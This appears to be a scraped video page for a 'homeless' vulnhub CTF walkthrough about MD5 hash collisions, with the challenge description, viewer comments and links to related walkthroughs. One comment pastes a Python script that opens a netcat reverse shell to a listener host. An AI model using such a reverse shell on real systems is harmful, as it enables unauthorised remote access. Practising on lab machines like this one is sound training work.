homeless vulnhub CTF walkthrough - Hash Collisions

Показать описание

Homeless Walkthrough
------------------
Sign up for my personal cybersecurity consultation
-------------------
- How to create md5 collisions
- Fastcoll Download page
--------------------------
VM description
Introduction
I'm really interesting about security, love to learn new technologies and play CTF sometime. I’ve been enjoying creating hacking challenges for the security community. This is my first Challenge of boot2root, I was created some web challenge and solved others.I hope you will get some knowledges about my challenge. Thanks u Laiwon . I love you.

Difficulty
Difficulty level to get limited shell: Intermediate or advanced
Difficulty level for privilege escalation: Depend on You.
Goal
You will be required to break into target server,exploit and root the machine, and retrieve the flag. The flag will contain more information about my private info..
Hints
This challenge is not for beginners. There is a relevant file on this machine that plays an important role in the challenge, do not waste your time trying to de-obfuscate the file, If you got big stuck, Try with Password start with "sec*" with nice wordlist. Ok.. Try Harder!..
Happy Hacking!...
--------------------------

Рекомендации по теме

Комментарии

Hello and thanks for posting that, i am stuck to the md5 part for ages now... My question is, you generate the files in windows and transfer them to your kali, and then you run the md5-c.sh script that generates the appropriate files on the same directory. Can you explain your md5-c.sh configuration because in my case it just dumps 4 empty files (zero data) and in the ./collisions/col directory...
Many thanks

mantzini

Thanks for sharing this video. I had lost hope to this VM.

acvKaZe

Thanks to your video I was able to create three binary files which are different (checked with shasum) but have the same md5 sum. Unfortunately the curl command isn't successful. Probably because I get the error
bash: warning: command substitution: ignored null byte in input
I created several new files, but I always run into this error and therefore only get the result message "Invalid password" from the server... Any idea what I'm doing wrong?

somebody-uzbm

I am stuck at the last step to access the root after downfall user, using the following python shell (homeless.py) which is in /lib/logs/ but cant access unfortunately any let me know please what is missed. thanks

!/usr/bin/env python
import os
os.system('/bin/nc 192.168.106.133 4444 -e /bin/bash')
os.system('date')
print "Hello, Bosss!, \nI am clearning your room"

hadinazari

Can you share Kali Linux Background Wallpaper?

jjunny

homeless vulnhub CTF walkthrough - Hash Collisions

homeless vulnhub CTF walkthrough - Hash Collisions

SSH Log File Poisoning | The Ether: Evil Science Vulnhub CTF walkthrough

JIS CTF vulnhub walkthrough

Ted:1 CTF Vulnhub.com Walkthrough - Security Unleashed

Bulldog2 CTF vulnhub walkthrough l OSCP Video Course Prep

Blacklight Vulnhub CTF walkthrough - Penetration Testing and Cybersecurity Training

Ethical Hacking & Linux Security Training | Lin security Vulnhub CTF Walkthrough

Ethical Hacking Training | TrollCave Vulnhub CTF walkthrough

Log File Poisoning | G0rmint Vulnhub CTF Walkthrough

Server Side Includes Injection Explained | EP1 | H.A.S.T.E Vulnhub Walkthrough CTF

Wordpress Penetration Testing | EP1 | LazySysAdmin VulnHub Walkthrough CTF

Web Application Exploitation | EP1 | C0m80 Vulnhub CTF challenge

Ethical Hacking Training | W1R3S Vulnhub CTF walkthrough

Directory Traversal with Dirbuster | D0not5top Vulnhub CTF Walkthrough | P1

Zico 2 CTF Walkthrough

Source: 1 (Webmin Exploit) | Vulnhub | OSCP Prep | CTF Walkthrough

Bob 1st part vulnhub walkthrough - Penetration Testing and Cybersecurity Training

Five86-1 Vulnhub Walkthrough | Boot to Root

CTF TommyBoy

DINA vulnhub

Jarbas walkthrough | vulnhub

Gemini Inc v2 Vulnerable Machine Walkthrough

7MS #207: Vulnhub Walkthrough - Sidney

lin.security partial walkthrough